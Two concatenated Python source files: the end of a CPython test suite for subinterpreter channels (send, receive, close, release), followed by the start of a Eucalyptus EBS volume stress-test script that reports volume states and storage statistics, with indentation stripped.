"""Test listing channel interpreters with a channel's send end closed."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
cid = interpreters.channel_create()
# Put something in the channel so that it's not empty.
interpreters.channel_send(cid, "send")
# Check initial state.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 1)
self.assertEqual(len(recv_interps), 0)
# Close the send end of the channel.
interpreters.channel_close(cid, send=True)
# Send end should raise an error.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
# Receive end should not be closed (since channel is not empty).
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(recv_interps), 0)
# Close the receive end of the channel from a subinterpreter.
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_close({cid}, force=True)
"""))
# Both ends should raise an error.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=False)
####################
def test_send_recv_main(self):
cid = interpreters.channel_create()
orig = b'spam'
interpreters.channel_send(cid, orig)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, orig)
self.assertIsNot(obj, orig)
def test_send_recv_same_interpreter(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
orig = b'spam'
_interpreters.channel_send(cid, orig)
obj = _interpreters.channel_recv(cid)
assert obj is not orig
assert obj == orig
"""))
def test_send_recv_different_interpreters(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = _run_output(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_send_recv_different_threads(self):
cid = interpreters.channel_create()
def f():
while True:
try:
obj = interpreters.channel_recv(cid)
break
except interpreters.ChannelEmptyError:
time.sleep(0.1)
interpreters.channel_send(cid, obj)
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_send_recv_different_interpreters_and_threads(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = None
def f():
nonlocal out
out = _run_output(id1, dedent(f"""
import time
import _xxsubinterpreters as _interpreters
while True:
try:
obj = _interpreters.channel_recv({cid})
break
except _interpreters.ChannelEmptyError:
time.sleep(0.1)
assert(obj == b'spam')
_interpreters.channel_send({cid}, b'eggs')
"""))
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'eggs')
def test_send_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_send(10, b'spam')
def test_recv_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_recv(10)
def test_recv_empty(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelEmptyError):
interpreters.channel_recv(cid)
def test_recv_default(self):
default = object()
cid = interpreters.channel_create()
obj1 = interpreters.channel_recv(cid, default)
interpreters.channel_send(cid, None)
interpreters.channel_send(cid, 1)
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'eggs')
obj2 = interpreters.channel_recv(cid, default)
obj3 = interpreters.channel_recv(cid, default)
obj4 = interpreters.channel_recv(cid)
obj5 = interpreters.channel_recv(cid, default)
obj6 = interpreters.channel_recv(cid, default)
self.assertIs(obj1, default)
self.assertIs(obj2, None)
self.assertEqual(obj3, 1)
self.assertEqual(obj4, b'spam')
self.assertEqual(obj5, b'eggs')
self.assertIs(obj6, default)
def test_run_string_arg_unresolved(self):
cid = interpreters.channel_create()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(cid.end)
_interpreters.channel_send(cid, b'spam')
"""),
dict(cid=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# XXX For now there is no high-level channel into which the
# sent channel ID can be converted...
# Note: this test caused crashes on some buildbots (bpo-33615).
@unittest.skip('disabled until high-level channels exist')
def test_run_string_arg_resolved(self):
cid = interpreters.channel_create()
cid = interpreters._channel_id(cid, _resolve=True)
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(chan.id.end)
_interpreters.channel_send(chan.id, b'spam')
"""),
dict(chan=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# close
def test_close_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
interpreters.run_string(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_recv({cid})
"""))
interpreters.channel_close(cid)
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id2, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
def test_close_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_empty(self):
tests = [
(False, False),
(True, False),
(False, True),
(True, True),
]
for send, recv in tests:
with self.subTest((send, recv)):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, send=send, recv=recv)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_defaults_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
def test_close_recv_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_send_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True, send=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_recv_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_send_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_close({cid}, force=True)
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_channel_list_interpreters_invalid_channel(self):
cid = interpreters.channel_create()
# Test for invalid channel ID.
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_list_interpreters(1000, send=True)
interpreters.channel_close(cid)
# Test for a channel that has been closed.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
def test_channel_list_interpreters_invalid_args(self):
# Tests for invalid arguments passed to the API.
cid = interpreters.channel_create()
with self.assertRaises(TypeError):
interpreters.channel_list_interpreters(cid)
@unittest.skip("sgross: skip subinterpreter tests")
class ChannelReleaseTests(TestBase):
# XXX Add more test coverage a la the tests for close().
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
"""
"""
use
pre-release
release
after
check
"""
"""
release in: main, interp1
creator: same, other (incl. interp2)
use: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release forced: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
release: same
release forced: same
use after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
release after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
check released: send/recv for same/other(incl. interp2)
check closed: send/recv for same/other(incl. interp2)
"""
def test_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
out = _run_output(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
_interpreters.channel_release({cid})
print(repr(obj))
"""))
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_release({cid})
"""))
self.assertEqual(out.strip(), "b'spam'")
def test_no_kwargs(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_release(cid, send=True, recv=True)
def test_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_release({cid})
"""))
obj = interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
self.assertEqual(obj, b'spam')
def test_close_if_unassociated(self):
# XXX Something's not right with this test...
cid = interpreters.channel_create()
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_send({cid}, b'spam')
_interpreters.channel_release({cid})
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_partially(self):
# XXX Is partial close too weird/confusing?
cid = interpreters.channel_create()
interpreters.channel_send(cid, None)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'spam')
interpreters.channel_release(cid, send=True)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
class ChannelCloseFixture(namedtuple('ChannelCloseFixture',
'end interp other extra creator')):
# Set this to True to avoid creating interpreters, e.g. when
# scanning through test permutations without running them.
QUICK = False
def __new__(cls, end, interp, other, extra, creator):
assert end in ('send', 'recv')
if cls.QUICK:
known = {}
else:
interp = Interpreter.from_raw(interp)
other = Interpreter.from_raw(other)
extra = Interpreter.from_raw(extra)
known = {
interp.name: interp,
other.name: other,
extra.name: extra,
}
if not creator:
creator = 'same'
self = super().__new__(cls, end, interp, other, extra, creator)
self._prepped = set()
self._state = ChannelState()
self._known = known
return self
@property
def state(self):
return self._state
@property
def cid(self):
try:
return self._cid
except AttributeError:
creator = self._get_interpreter(self.creator)
self._cid = self._new_channel(creator)
return self._cid
def get_interpreter(self, interp):
interp = self._get_interpreter(interp)
self._prep_interpreter(interp)
return interp
def expect_closed_error(self, end=None):
if end is None:
end = self.end
if end == 'recv' and self.state.closed == 'send':
return False
return bool(self.state.closed)
def prep_interpreter(self, interp):
self._prep_interpreter(interp)
def record_action(self, action, result):
self._state = result
def clean_up(self):
clean_up_interpreters()
clean_up_channels()
# internal methods
def _new_channel(self, creator):
if creator.name == 'main':
return interpreters.channel_create()
else:
ch = interpreters.channel_create()
run_interp(creator.id, f"""
import _xxsubinterpreters
cid = _xxsubinterpreters.channel_create()
# We purposefully send back an int to avoid tying the
# channel to the other interpreter.
_xxsubinterpreters.channel_send({ch}, int(cid))
del _xxsubinterpreters
""")
self._cid = interpreters.channel_recv(ch)
return self._cid
def _get_interpreter(self, interp):
if interp in ('same', 'interp'):
return self.interp
elif interp == 'other':
return self.other
elif interp == 'extra':
return self.extra
else:
name = interp
try:
interp = self._known[name]
except KeyError:
interp = self._known[name] = Interpreter(name)
return interp
def _prep_interpreter(self, interp):
if interp.id in self._prepped:
return
self._prepped.add(interp.id)
if interp.name == 'main':
return
run_interp(interp.id, f"""
import _xxsubinterpreters as interpreters
import test.test__xxsubinterpreters as helpers
ChannelState = helpers.ChannelState
try:
cid
except NameError:
cid = interpreters._channel_id({self.cid})
""")
@unittest.skip('these tests take several hours to run')
class ExhaustiveChannelTests(TestBase):
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
- close after unbound
"""
"""
use
pre-close
close
after
check
"""
"""
close in: main, interp1
creator: same, other, extra
use: None,send,recv,send/recv in None,same,other,same+other,all
pre-close: None,send,recv in None,same,other,same+other,all
pre-close forced: None,send,recv in None,same,other,same+other,all
close: same
close forced: same
use after: None,send,recv,send/recv in None,same,other,extra,same+other,all
close after: None,send,recv,send/recv in None,same,other,extra,same+other,all
check closed: send/recv for same/other(incl. interp2)
"""
def iter_action_sets(self):
# - used / not used (associated / not associated)
# - empty / emptied / never emptied / partly emptied
# - closed / not closed
# - released / not released
# never used
yield []
# only pre-closed (and possible used after)
for closeactions in self._iter_close_action_sets('same', 'other'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
# used
for useactions in self._iter_use_action_sets('same', 'other'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for useactions in self._iter_use_action_sets('other', 'extra'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
def _iter_use_action_sets(self, interp1, interp2):
interps = (interp1, interp2)
# only recv end used
yield [
ChannelAction('use', 'recv', interp1),
]
yield [
ChannelAction('use', 'recv', interp2),
]
yield [
ChannelAction('use', 'recv', interp1),
ChannelAction('use', 'recv', interp2),
]
# never emptied
yield [
ChannelAction('use', 'send', interp1),
]
yield [
ChannelAction('use', 'send', interp2),
]
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
]
# partially emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
]
# fully emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
for interp4 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
ChannelAction('use', 'recv', interp4),
]
def _iter_close_action_sets(self, interp1, interp2):
ends = ('recv', 'send')
interps = (interp1, interp2)
for force in (True, False):
op = 'force-close' if force else 'close'
for interp in interps:
for end in ends:
yield [
ChannelAction(op, end, interp),
]
for recvop in ('close', 'force-close'):
for sendop in ('close', 'force-close'):
for recv in interps:
for send in interps:
yield [
ChannelAction(recvop, 'recv', recv),
ChannelAction(sendop, 'send', send),
]
def _iter_post_close_action_sets(self):
for interp in ('same', 'extra', 'other'):
yield [
ChannelAction('use', 'recv', interp),
]
yield [
ChannelAction('use', 'send', interp),
]
def run_actions(self, fix, actions):
for action in actions:
self.run_action(fix, action)
def run_action(self, fix, action, *, hideclosed=True):
end = action.resolve_end(fix.end)
interp = action.resolve_interp(fix.interp, fix.other, fix.extra)
fix.prep_interpreter(interp)
if interp.name == 'main':
result = run_action(
fix.cid,
action.action,
end,
fix.state,
hideclosed=hideclosed,
)
fix.record_action(action, result)
else:
_cid = interpreters.channel_create()
run_interp(interp.id, f"""
result = helpers.run_action(
{fix.cid},
{repr(action.action)},
{repr(end)},
{repr(fix.state)},
hideclosed={hideclosed},
)
interpreters.channel_send({_cid}, result.pending.to_bytes(1, 'little'))
interpreters.channel_send({_cid}, b'X' if result.closed else b'')
""")
result = ChannelState(
pending=int.from_bytes(interpreters.channel_recv(_cid), 'little'),
closed=bool(interpreters.channel_recv(_cid)),
)
fix.record_action(action, result)
def iter_fixtures(self):
# XXX threads?
interpreters = [
('main', 'interp', 'extra'),
('interp', 'main', 'extra'),
('interp1', 'interp2', 'extra'),
('interp1', 'interp2', 'main'),
]
for interp, other, extra in interpreters:
for creator in ('same', 'other', 'creator'):
for end in ('send', 'recv'):
yield ChannelCloseFixture(end, interp, other, extra, creator)
def _close(self, fix, *, force):
op = 'force-close' if force else 'close'
close = ChannelAction(op, fix.end, 'same')
if not fix.expect_closed_error():
self.run_action(fix, close, hideclosed=False)
else:
with self.assertRaises(interpreters.ChannelClosedError):
self.run_action(fix, close, hideclosed=False)
def _assert_closed_in_interp(self, fix, interp=None):
if interp is None or interp.name == 'main':
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(fix.cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid, force=True)
else:
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_recv(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_send(cid, b'spam')
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid, force=True)
""")
def _assert_closed(self, fix):
self.assertTrue(fix.state.closed)
for _ in range(fix.state.pending):
interpreters.channel_recv(fix.cid)
self._assert_closed_in_interp(fix)
for interp in ('same', 'other'):
interp = fix.get_interpreter(interp)
if interp.name == 'main':
continue
self._assert_closed_in_interp(fix, interp)
interp = fix.get_interpreter('fresh')
self._assert_closed_in_interp(fix, interp)
def _iter_close_tests(self, verbose=False):
i = 0
for actions in self.iter_action_sets():
print()
for fix in self.iter_fixtures():
i += 1
if i > 1000:
return
if verbose:
if (i - 1) % 6 == 0:
print()
print(i, fix, '({} actions)'.format(len(actions)))
else:
if (i - 1) % 6 == 0:
print(' ', end='')
print('.', end=''); sys.stdout.flush()
yield i, fix, actions
if verbose:
print('---')
print()
# This is useful for scanning through the possible tests.
def _skim_close_tests(self):
ChannelCloseFixture.QUICK = True
for i, fix, actions in self._iter_close_tests():
pass
def test_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=False)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
def test_force_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=True)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
if __name__ == '__main__':
unittest.main()
|
ebs_stress.py
|
#!/usr/bin/python
#
#
# Description: This script contains test cases/modules for stress testing EBS-specific actions and
#              features of Eucalyptus.
#
##########################
# #
# Test Cases #
# #
##########################
#
# [EbsStress]
#
# This case was developed to test the integrity of the following:
# * state of tgtd (SCSI target daemon)
# * disk state of SC machine
# * PSQL database state of eucalyptus_storage table:
# - iscsivolumeinfo relation
# - volumes relation
# - iscsimetadata relation
# - storage_stats_info
# * PSQL database state of eucalyptus_cloud table:
# - metadata_volumes
# * Loopback device integrity
# * LVM integrity
# after stressing the SC with asynchronous volume create/delete calls.
#
# [GenerateVolumesLoad]
#
# This case was developed to test the creation of volumes in a serial manner.
# This case is a subcase of EbsStress.
#
# [GenerateCloudStatistics]
#
# This case was developed to provide statistical output of EBS related information
# for the cloud. Currently, it displays the following information:
# * number of creating, available, deleting, deleted, and failed volumes
# * PSQL database state of eucalyptus_storage table:
# - iscsivolumeinfo relation
# - volumes relation
# - iscsimetadata relation
# - storage_stats_info
# * PSQL database state of eucalyptus_cloud table:
# - metadata_volumes
#
#
# [EbsBotoStress]
#
# This case does the same as EbsStress, except it uses boto calls to create the volumes.
# This allows create_volume to be called without waiting for the volume to get into
# an available state. The volumes that do reach an "available" state are deleted in
# GenerateCloudStatistics.
#
# [GenerateVolumesBoto]
#
# This case was developed to test the creation of volumes in a serial manner using boto.
# This case is a subcase of EbsBotoStress.
#
#
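# Example invocation (hypothetical paths/values; adjust for your environment):
#
#   ./ebs_stress.py --config_file /path/to/cloud.conf --clc-password secret \
#       --number 20 --thread_number 4 --debug \
#       --tests EbsStress GenerateCloudStatistics
#
#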
import unittest
import time
from eucaops import Eucaops
from eutester import xmlrunner
import os
import re
import random
import argparse
import string
import sys
import pprint
import datetime
class LoadGenerator(unittest.TestCase):
def setUp(self):
# Setup basic eutester object
if options.config_file:
self.tester = Eucaops(config_file=options.config_file, password=options.clc_password)
else:
print "\tNeed to pass --config_file option. Try --help for more information\n"
exit(1)
### Grab zone for volume tests
zones = self.tester.ec2.get_all_zones()
self.zone = random.choice(zones).name
self.volumes = []
self.statuses = []
def tearDown(self):
"""
If extra debugging is set, print additional CLC and SC information
"""
if options.print_debug is True:
self.get_clc_stats()
self.get_sc_stats()
"""
Print the results of volumes created and total volumes of cloud
"""
self.current_ebs_reporting()
"""
Print all the volumes' statuses for the entire cloud
"""
self.overall_ebs_reporting()
"""
Display information in eucalyptus_storage,eucalyptus_cloud tables related to EBS -
* eucalyptus_storage relations: iscsivolumeinfo, iscsimetadata, volumes, storage_stats_info
* eucalyptus_cloud relations: metadata_volumes
"""
        self.iscsivolumeinfo_db_dump()
self.iscsimetadata_db_dump()
self.volumes_db_dump()
self.cloudmetadata_db_dump()
self.storagestats_db_dump()
"""
Now destroy volumes created and reached available state from test
"""
for vol in self.volumes:
if vol.status == 'available':
self.tester.delete_volume(vol)
self.volumes = None
self.statuses = None
self.tester = None
def current_ebs_reporting(self):
"""
Print the results of volumes created and total volumes of cloud
"""
found_creating = self.statuses.count("creating")
found_available = self.statuses.count("available")
found_deleting = self.statuses.count("deleting")
found_deleted = self.statuses.count("deleted")
found_failed = self.statuses.count("failed")
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Results of Finished Test ****\n")
self.tester.debug("\t" + str(found_creating) + " Volumes in CREATING state.\n")
self.tester.debug("\t" + str(found_available) + " Volumes in AVAILABLE state.\n")
self.tester.debug("\t" + str(found_deleting) + " Volumes in DELETING state.\n")
self.tester.debug("\t" + str(found_deleted) + " Volumes in DELETED state.\n")
self.tester.debug("\t" + str(found_failed) + " Volumes in FAILED state.\n")
self.tester.debug("##########################################\n")
found_creating = None
found_available = None
found_deleting = None
found_deleted = None
found_failed = None
def overall_ebs_reporting(self):
"""
Print all the volumes' statuses for the entire cloud
"""
volumes = self.tester.get_volumes()
statuses = []
for master_vol in volumes:
statuses.append(master_vol.status)
overall_creating = statuses.count("creating")
overall_available = statuses.count("available")
overall_deleting = statuses.count("deleting")
overall_deleted = statuses.count("deleted")
overall_failed = statuses.count("failed")
"""
Grab cloud property for volume location to get stats of files.
"""
volumes_dir = ""
for machine in self.tester.get_component_machines("clc"):
if volumes_dir == "":
volumes_dir = (machine.sys("source " + self.tester.credpath + "/eucarc && euca-describe-properties | grep volumesdir | awk '{print $3}'"))
overall_ebs_size = len(volumes)
ebs_filesystem_size = ""
for machine in self.tester.get_component_machines("sc"):
ebs_filesystem_size = (machine.sys("du -sh " + volumes_dir[0]))
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Results of Current Volumes on Cloud ****\n")
self.tester.debug("\t" + str(overall_creating) + " Volumes in CREATING state.\n")
self.tester.debug("\t" + str(overall_available) + " Volumes in AVAILABLE state.\n")
self.tester.debug("\t" + str(overall_deleting) + " Volumes in DELETING state.\n")
self.tester.debug("\t" + str(overall_deleted) + " Volumes in DELETED state.\n")
self.tester.debug("\t" + str(overall_failed) + " Volumes in FAILED state.\n")
self.tester.debug("==========================================\n")
self.tester.debug("Sum of All EBS Volume Sizes (in GBs): " + str(overall_ebs_size) + "\n")
self.tester.debug("Disk Space Used under Cloud defined Storage Directory [ " + volumes_dir[0] + " ]: " + ebs_filesystem_size[0] + "\n")
self.tester.debug("##########################################\n")
"""
Make sure and clean up volumes that got to "available" state; this is mostly for EbsBotoStress cleanup
"""
for vol in volumes:
if vol.status == 'available':
self.tester.delete_volume(vol)
"""
Clean up everything else
"""
statuses = None
volumes = None
ebs_filesystem_size = None
overall_ebs_size = None
volumes_dir = None
overall_creating = None
overall_available = None
